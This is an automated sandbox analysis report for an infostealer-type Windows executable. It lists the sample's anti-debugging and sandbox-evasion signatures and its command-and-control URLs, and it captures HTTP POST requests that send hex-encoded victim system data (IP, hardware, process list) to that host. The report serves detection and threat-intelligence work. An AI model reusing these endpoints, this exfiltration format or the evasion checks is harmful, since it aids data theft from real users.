Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
B43WRnzSPD.exe

Overview

General Information

Sample name:B43WRnzSPD.exe
renamed because original name is a hash value
Original sample name:76e5a31451eefe694a963ae5b65ecff2.exe
Analysis ID:1579965
MD5:76e5a31451eefe694a963ae5b65ecff2
SHA1:5517f0db4c84c605574c618567afa40274a1c7a1
SHA256:3955f6fc16ce4d34bd50409f6f98825d3568e370f9f980d8e82dfbe8d7dbd04c
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • B43WRnzSPD.exe (PID: 2664 cmdline: "C:\Users\user\Desktop\B43WRnzSPD.exe" MD5: 76E5A31451EEFE694A963AE5B65ECFF2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: B43WRnzSPD.exeAvira: detected
Antivirus detection for URL or domain
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQAvira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwYAvira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850fd4Avira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: B43WRnzSPD.exeJoe Sandbox ML: detected
Source: B43WRnzSPD.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [ebp+04h], 424D53FFh1_2_0066A5B0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [edi+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [edi+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0066B560
Source: B43WRnzSPD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0060255D
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_006029FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 442861Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 37 30 35 32 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 128Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006CA8C0 recvfrom,1_2_006CA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20ht.top
Source: unknownHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 442861Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 37 30 35 32 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQ
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: B43WRnzSPD.exe, 00000001.00000003.2018790782.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018770520.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3
Source: B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2020839491.0000000001925000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018015700.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018386317.00000000018C7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020572030.00000000018C8000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2017988366.0000000001913000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018071816.0000000001920000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=
Source: B43WRnzSPD.exe, 00000001.00000003.2018790782.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018770520.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850fd4
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: B43WRnzSPD.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

barindex
PE file contains section with special chars
Source: B43WRnzSPD.exeStatic PE information: section name:
Source: B43WRnzSPD.exeStatic PE information: section name: .idata
Source: B43WRnzSPD.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018ECDFA1_3_018ECDFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018ECDFA1_3_018ECDFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018ECDFA1_3_018ECDFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018ECDFA1_3_018ECDFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006105B01_2_006105B0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00616FA01_2_00616FA0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0063F1001_2_0063F100
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006CB1801_2_006CB180
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006D00E01_2_006D00E0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0098E0301_2_0098E030
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006662101_2_00666210
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006CC3201_2_006CC320
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006D04201_2_006D0420
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_009544101_2_00954410
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060E6201_2_0060E620
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_009847801_2_00984780
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006CC7701_2_006CC770
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0066A7F01_2_0066A7F0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_009667301_2_00966730
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060A9601_2_0060A960
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006149401_2_00614940
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006BC9001_2_006BC900
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_008BAAC01_2_008BAAC0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_007D6AC01_2_007D6AC0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00794B601_2_00794B60
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00978BF01_2_00978BF0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_008BAB2C1_2_008BAB2C
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060CBB01_2_0060CBB0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0098CC701_2_0098CC70
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0097CD801_2_0097CD80
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00984D401_2_00984D40
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_007C0D801_2_007C0D80
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0091AE301_2_0091AE30
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00952F901_2_00952F90
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00624F701_2_00624F70
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006CEF901_2_006CEF90
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006C8F901_2_006C8F90
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006110E61_2_006110E6
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0096D4301_2_0096D430
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_009735B01_2_009735B0
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_009917801_2_00991780
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006073F0 appears 100 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 00645340 appears 34 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 00644F40 appears 269 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 007B7220 appears 86 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 007DCBC0 appears 71 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 00644FD0 appears 200 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 0061CCD0 appears 53 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006075A0 appears 545 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 0061CD40 appears 63 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006E44A0 appears 56 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006450A0 appears 77 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 006071E0 appears 40 times
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: String function: 0060CAA0 appears 62 times
Source: B43WRnzSPD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: B43WRnzSPD.exeStatic PE information: Section: acnazlro ZLIB complexity 0.9944080769368211
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_0060255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0060255D
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_006029FF
Source: C:\Users\user\Desktop\B43WRnzSPD.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\B43WRnzSPD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: B43WRnzSPD.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: B43WRnzSPD.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: pnrpnsp.dllJump to behavior
